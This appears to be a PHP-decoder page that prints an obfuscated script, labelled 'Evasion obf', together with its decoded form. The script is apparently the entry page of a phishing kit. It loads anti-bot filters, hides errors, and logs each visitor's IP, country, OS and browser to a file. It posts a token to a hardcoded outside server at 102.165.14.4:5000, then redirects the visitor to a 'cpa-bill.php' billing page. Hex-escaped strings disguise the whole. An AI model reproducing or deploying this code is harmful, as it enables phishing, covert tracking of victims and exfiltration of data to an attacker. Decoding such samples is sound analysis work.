Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // Evasion obf goto o5qi5; yI8Jt: $url = "\150\164\x74\x70\x3a\x2f\57\x31\60\62..

Decoded Output download

<?php 
 
// Evasion obf 
 goto o5qi5; yI8Jt: $url = "http://102.165.14.4:5000/receive_token?referrer=loco"; goto svsmI; BAzYZ: if ($site_refer == '') { $site = "dirrect connection"; } else { $site = $site_refer; } goto bW5tm; IcFYF: $ip = $_SERVER["REMOTE_ADDR"]; goto dr2Q5; o2gVL: include "M3tri-hash-bots/anti4.php"; goto qYkmA; wpV26: $csrftoken = base64_encode($_SERVER["HTTP_USER_AGENT"] . getenv("REMOTE_ADDR") . date("Y:M:D")); goto U836a; jpiXQ: fclose($myfile); goto wpV26; ldYaD: include "M3tri-hash-bots/anti1.php"; goto BncuW; U836a: $DIR = "cpa-bill.php?token=" . $csrftoken; goto BTJXB; paZgF: @ini_set("log_errors", "0"); goto I8LCe; HYxgi: file_get_contents($url, false, $context); goto PFco_; PFco_: session_destroy(); goto MB3lj; jzN35: include "M3tri-hash-bots/anti9.php"; goto ECp6D; svsmI: $data = array("token" => $token); goto oaua4; yxvQE: include "M3tri-hash-bots/anti6.php"; goto JJljC; gqTX2: @ini_set("display_startup_errors", "0"); goto paZgF; iYopR: include "M3tri-hash-bots/anti8.php"; goto jzN35; gZCg0: $myfile = file_put_contents("./visites/visited-ips.txt", date("Y-m-d - H:i:s - ") . $country . " " . $ip . " | " . $user_os . " | " . $user_browser . " | Come from site :" . $site . " | user agent:" . $user_agent . PHP_EOL, FILE_APPEND | LOCK_EX); goto jpiXQ; UCBa4: include "M3tri-hash-bots/anti3.php"; goto o2gVL; y7iPf: function getOS() { global $user_agent; $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/kalilinux/i" => "KaliLinux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile", "/Windows Phone/i" => "Windows Phone"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto IK4P5; JJljC: include "M3tri-hash-bots/anti7.php"; goto iYopR; oaua4: $context = stream_context_create(array("http" => array("header" => "Content-type: application/x-www-form-urlencoded\xd
", "method" => "POST", "content" => http_build_query($data)))); goto HYxgi; I8LCe: include "config.php"; goto yI8Jt; rfJW0: $user_os = getOS(); goto Baq1g; dr2Q5: $site_refer = $_SERVER["HTTP_REFERER"]; goto BAzYZ; Baq1g: $user_browser = getBrowser(); goto IcFYF; bW5tm: $owner = "HIDE THIS IP ADDRESS"; goto KqKGc; ECp6D: $user_agent = $_SERVER["HTTP_USER_AGENT"]; goto y7iPf; zBRkr: @ini_set("html_errors", "0"); goto Ekcrn; MB3lj: include "M3tri-hash-bots/anti0.php"; goto ldYaD; KqKGc: $owner_country = "YOUR COUNTRY TAG FOR YOUR IP \xe2\x86\x91"; goto sYCW7; o5qi5: error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); goto zBRkr; Ekcrn: @ini_set("display_errors", "0"); goto gqTX2; BTJXB: header("location:{$DIR}"); goto y60FC; BncuW: include "M3tri-hash-bots/anti2.php"; goto UCBa4; IK4P5: function getBrowser() { global $user_agent; $browser = "Unknown Browser"; $browser_array = array("/msie/i" => "Internet Explorer", "/firefox/i" => "Firefox", "/Mozilla/i" => "Mozilla", "/Mozilla/5.0/i" => "Mozilla", "/safari/i" => "Safari", "/chrome/i" => "Chrome", "/edge/i" => "Edge", "/opera/i" => "Opera", "/OPR/i" => "Opera", "/netscape/i" => "Netscape", "/maxthon/i" => "Maxthon", "/konqueror/i" => "Konqueror", "/Bot/i" => "BOT Browser", "/Valve Steam GameOverlay/i" => "Steam", "/mobile/i" => "Handheld Browser"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $browser = $value; } } return $browser; } goto rfJW0; qYkmA: include "M3tri-hash-bots/anti5.php"; goto yxvQE; sYCW7: if ($ip == $owner) { $ip = "Owner"; $country = $owner_country; } else { $details = json_decode(file_get_contents("http://ipinfo.io/{$ip}")); $country = $details->country; } goto gZCg0; y60FC: ?> 
 
?php>

Did this file decode correctly?

Original Code

<?php

// Evasion obf
 goto o5qi5; yI8Jt: $url = "\150\164\x74\x70\x3a\x2f\57\x31\60\62\56\61\66\x35\56\61\x34\56\x34\x3a\65\60\x30\x30\x2f\162\145\143\145\151\166\145\x5f\x74\x6f\x6b\x65\156\x3f\162\145\146\x65\162\x72\145\x72\x3d\x6c\157\143\157"; goto svsmI; BAzYZ: if ($site_refer == '') { $site = "\144\151\x72\x72\x65\x63\164\40\143\157\x6e\156\145\x63\x74\x69\157\x6e"; } else { $site = $site_refer; } goto bW5tm; IcFYF: $ip = $_SERVER["\x52\x45\115\117\124\105\137\101\104\x44\122"]; goto dr2Q5; o2gVL: include "\115\x33\164\x72\151\55\150\141\x73\x68\55\142\x6f\x74\163\x2f\141\156\x74\151\64\56\x70\x68\160"; goto qYkmA; wpV26: $csrftoken = base64_encode($_SERVER["\110\x54\x54\x50\x5f\125\123\105\x52\x5f\101\x47\105\116\124"] . getenv("\122\105\x4d\117\x54\105\137\x41\x44\104\x52") . date("\x59\x3a\115\x3a\104")); goto U836a; jpiXQ: fclose($myfile); goto wpV26; ldYaD: include "\115\63\164\x72\x69\55\150\141\163\x68\55\142\157\164\163\57\x61\x6e\x74\151\61\56\x70\x68\x70"; goto BncuW; U836a: $DIR = "\x63\x70\x61\x2d\x62\151\154\x6c\x2e\160\x68\160\x3f\164\157\153\145\x6e\75" . $csrftoken; goto BTJXB; paZgF: @ini_set("\x6c\157\x67\x5f\x65\162\162\157\162\x73", "\60"); goto I8LCe; HYxgi: file_get_contents($url, false, $context); goto PFco_; PFco_: session_destroy(); goto MB3lj; jzN35: include "\115\63\164\162\151\x2d\150\x61\x73\x68\x2d\142\x6f\164\x73\x2f\x61\156\164\x69\71\56\x70\150\160"; goto ECp6D; svsmI: $data = array("\164\x6f\153\x65\x6e" => $token); goto oaua4; yxvQE: include "\115\63\x74\162\151\x2d\150\x61\x73\150\x2d\x62\x6f\x74\x73\x2f\141\x6e\x74\x69\x36\56\160\150\160"; goto JJljC; gqTX2: @ini_set("\x64\x69\163\160\154\141\x79\x5f\163\164\x61\162\x74\x75\160\x5f\x65\162\162\x6f\x72\x73", "\60"); goto paZgF; iYopR: include "\115\x33\164\x72\x69\x2d\x68\x61\163\150\55\142\157\164\163\x2f\141\156\164\x69\x38\56\160\150\160"; goto jzN35; gZCg0: $myfile = file_put_contents("\x2e\x2f\x76\x69\163\x69\164\x65\x73\x2f\166\x69\163\x69\x74\145\x64\55\151\160\163\56\x74\170\164", date("\x59\55\x6d\x2d\144\40\x2d\40\x48\x3a\151\x3a\x73\x20\55\40") . $country . "\x20" . $ip . "\x20\x7c\x20" . $user_os . "\x20\174\x20" . $user_browser . "\x20\x7c\x20\103\157\155\145\40\146\x72\x6f\x6d\x20\163\151\x74\145\40\x3a" . $site . "\40\x7c\40\165\163\145\x72\40\x61\147\145\x6e\164\72" . $user_agent . PHP_EOL, FILE_APPEND | LOCK_EX); goto jpiXQ; UCBa4: include "\115\x33\x74\x72\x69\55\x68\141\163\150\55\x62\x6f\x74\163\57\141\156\x74\x69\x33\56\x70\x68\160"; goto o2gVL; y7iPf: function getOS() { global $user_agent; $os_platform = "\x55\x6e\x6b\x6e\157\x77\156\40\117\123\40\x50\x6c\141\x74\146\x6f\x72\155"; $os_array = array("\x2f\x77\x69\156\144\157\x77\x73\x20\x6e\x74\40\61\x30\57\151" => "\127\x69\x6e\x64\x6f\x77\163\x20\61\x30", "\x2f\167\x69\156\144\157\167\x73\40\x6e\x74\40\x36\56\63\57\x69" => "\127\151\x6e\144\157\x77\x73\x20\x38\56\x31", "\57\x77\x69\156\x64\157\x77\163\40\156\164\x20\66\x2e\62\x2f\151" => "\x57\151\156\x64\157\167\x73\x20\x38", "\x2f\x77\x69\156\144\157\x77\x73\x20\x6e\x74\x20\x36\56\61\57\x69" => "\127\x69\x6e\x64\x6f\167\x73\x20\67", "\x2f\x77\x69\x6e\x64\157\x77\163\x20\x6e\x74\x20\66\56\60\57\151" => "\x57\151\156\144\x6f\x77\163\x20\x56\151\163\164\141", "\57\x77\x69\x6e\x64\157\167\163\40\156\164\40\x35\x2e\x32\x2f\x69" => "\x57\151\156\144\x6f\167\163\40\x53\145\x72\x76\145\x72\40\x32\60\x30\x33\x2f\x58\120\x20\170\66\x34", "\57\167\151\156\144\157\x77\163\x20\x6e\164\x20\65\x2e\x31\57\151" => "\x57\151\156\x64\157\x77\163\40\x58\120", "\x2f\x77\151\156\144\x6f\167\163\40\170\x70\57\151" => "\127\151\x6e\x64\157\167\x73\40\x58\120", "\57\167\x69\x6e\x64\x6f\x77\x73\x20\x6e\x74\40\65\x2e\x30\x2f\151" => "\x57\151\x6e\x64\157\x77\163\x20\x32\60\60\x30", "\57\167\x69\x6e\x64\157\167\x73\40\155\145\x2f\x69" => "\127\x69\x6e\x64\157\x77\x73\x20\115\x45", "\57\167\151\156\71\70\57\151" => "\127\x69\x6e\x64\157\167\163\40\71\x38", "\x2f\167\x69\x6e\71\x35\x2f\x69" => "\x57\151\x6e\144\x6f\x77\163\x20\x39\x35", "\57\167\x69\156\x31\x36\x2f\x69" => "\x57\x69\x6e\144\x6f\x77\x73\x20\x33\56\x31\x31", "\57\x6d\141\x63\x69\x6e\x74\157\x73\150\x7c\155\141\x63\x20\157\163\40\x78\x2f\x69" => "\115\x61\143\x20\117\x53\x20\130", "\57\x6d\141\x63\x5f\x70\x6f\x77\x65\x72\160\143\57\x69" => "\115\x61\143\40\x4f\x53\40\71", "\57\154\151\156\165\x78\57\151" => "\x4c\x69\x6e\x75\170", "\57\153\141\x6c\151\x6c\x69\x6e\165\170\x2f\151" => "\x4b\x61\x6c\x69\114\x69\156\165\x78", "\x2f\x75\x62\x75\156\164\165\x2f\151" => "\x55\142\x75\x6e\x74\165", "\57\x69\160\150\x6f\156\145\57\151" => "\x69\120\x68\x6f\156\145", "\57\x69\x70\x6f\144\x2f\151" => "\x69\120\157\144", "\x2f\151\160\x61\x64\57\x69" => "\x69\x50\141\x64", "\57\141\156\x64\x72\157\151\x64\57\x69" => "\x41\156\x64\162\157\151\144", "\57\142\154\x61\x63\153\142\145\x72\162\171\57\151" => "\102\154\x61\x63\x6b\102\145\162\x72\x79", "\x2f\167\145\142\157\163\x2f\151" => "\x4d\157\x62\x69\x6c\145", "\x2f\x57\x69\x6e\x64\x6f\167\163\40\x50\x68\x6f\x6e\145\x2f\151" => "\x57\151\x6e\144\x6f\x77\163\x20\x50\150\x6f\x6e\145"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } goto IK4P5; JJljC: include "\115\x33\x74\162\151\x2d\x68\x61\x73\x68\x2d\142\x6f\x74\163\57\x61\156\x74\151\67\56\160\150\x70"; goto iYopR; oaua4: $context = stream_context_create(array("\150\x74\x74\x70" => array("\x68\x65\141\144\x65\x72" => "\103\x6f\x6e\164\145\x6e\164\x2d\164\171\160\145\x3a\x20\x61\x70\x70\x6c\x69\143\x61\x74\151\x6f\x6e\57\x78\x2d\x77\x77\167\55\146\x6f\x72\155\55\165\162\154\x65\156\143\157\x64\145\x64\xd\12", "\x6d\145\x74\x68\157\x64" => "\120\x4f\x53\x54", "\143\x6f\x6e\x74\145\156\x74" => http_build_query($data)))); goto HYxgi; I8LCe: include "\143\157\156\x66\151\x67\56\x70\x68\x70"; goto yI8Jt; rfJW0: $user_os = getOS(); goto Baq1g; dr2Q5: $site_refer = $_SERVER["\x48\x54\x54\x50\x5f\122\x45\106\x45\x52\105\x52"]; goto BAzYZ; Baq1g: $user_browser = getBrowser(); goto IcFYF; bW5tm: $owner = "\x48\x49\104\105\x20\x54\x48\x49\123\x20\x49\x50\40\101\104\x44\122\105\123\x53"; goto KqKGc; ECp6D: $user_agent = $_SERVER["\x48\124\124\120\137\x55\x53\105\x52\x5f\101\107\105\116\x54"]; goto y7iPf; zBRkr: @ini_set("\x68\x74\x6d\x6c\137\x65\x72\162\157\162\163", "\60"); goto Ekcrn; MB3lj: include "\x4d\x33\164\x72\x69\x2d\150\141\x73\x68\55\x62\x6f\164\163\x2f\x61\156\x74\151\60\x2e\160\x68\160"; goto ldYaD; KqKGc: $owner_country = "\x59\x4f\125\x52\x20\x43\117\125\116\x54\x52\131\40\124\x41\107\40\106\117\122\x20\x59\117\125\122\x20\x49\120\x20\xe2\x86\x91"; goto sYCW7; o5qi5: error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE); goto zBRkr; Ekcrn: @ini_set("\144\151\x73\x70\x6c\x61\171\137\x65\x72\x72\x6f\162\163", "\x30"); goto gqTX2; BTJXB: header("\x6c\x6f\143\141\164\x69\x6f\156\72{$DIR}"); goto y60FC; BncuW: include "\x4d\63\x74\x72\x69\55\x68\141\163\x68\55\x62\x6f\164\163\57\x61\156\x74\x69\x32\56\160\150\x70"; goto UCBa4; IK4P5: function getBrowser() { global $user_agent; $browser = "\125\156\x6b\x6e\x6f\167\156\40\x42\x72\157\167\x73\x65\162"; $browser_array = array("\x2f\x6d\163\x69\x65\x2f\151" => "\111\156\x74\145\x72\x6e\145\164\40\105\170\x70\154\157\x72\145\x72", "\57\x66\x69\162\145\x66\x6f\170\57\x69" => "\x46\x69\162\145\x66\x6f\x78", "\57\115\x6f\x7a\151\x6c\x6c\x61\57\x69" => "\115\x6f\x7a\151\154\x6c\x61", "\57\x4d\x6f\172\x69\x6c\154\141\x2f\65\x2e\x30\x2f\151" => "\115\x6f\172\x69\x6c\154\141", "\57\x73\141\146\x61\162\151\57\151" => "\x53\x61\x66\141\x72\151", "\57\143\150\x72\157\155\x65\57\151" => "\103\x68\162\157\155\x65", "\57\x65\144\x67\x65\x2f\x69" => "\x45\x64\147\x65", "\x2f\157\x70\x65\x72\x61\57\x69" => "\117\160\x65\162\141", "\57\x4f\x50\122\x2f\x69" => "\x4f\160\145\162\141", "\x2f\x6e\145\164\163\143\141\x70\145\57\x69" => "\x4e\145\164\x73\143\141\x70\145", "\57\x6d\x61\x78\164\150\157\x6e\57\x69" => "\115\x61\x78\164\x68\157\x6e", "\57\153\157\x6e\161\165\x65\162\x6f\162\57\x69" => "\x4b\157\x6e\x71\165\x65\x72\157\162", "\x2f\x42\x6f\164\x2f\151" => "\102\x4f\124\x20\102\x72\x6f\167\x73\145\162", "\x2f\126\x61\154\166\145\40\x53\164\145\141\155\40\x47\141\155\145\x4f\x76\145\x72\x6c\141\x79\57\x69" => "\123\164\x65\141\x6d", "\x2f\x6d\x6f\142\151\x6c\x65\x2f\x69" => "\x48\x61\156\144\x68\x65\x6c\x64\40\x42\x72\x6f\167\163\x65\x72"); foreach ($browser_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $browser = $value; } } return $browser; } goto rfJW0; qYkmA: include "\x4d\x33\164\162\151\x2d\x68\141\163\150\55\142\x6f\x74\163\57\x61\x6e\164\151\65\56\x70\x68\x70"; goto yxvQE; sYCW7: if ($ip == $owner) { $ip = "\117\167\x6e\x65\x72"; $country = $owner_country; } else { $details = json_decode(file_get_contents("\150\164\x74\x70\72\57\57\151\160\151\156\x66\157\x2e\x69\x6f\x2f{$ip}")); $country = $details->country; } goto gZCg0; y60FC: ?>

?php>

Function Calls

None

Variables

None

Stats

MD5 95c7df9731d17a5dd900268083dc80f9
Eval Count 0
Decode Time 59 ms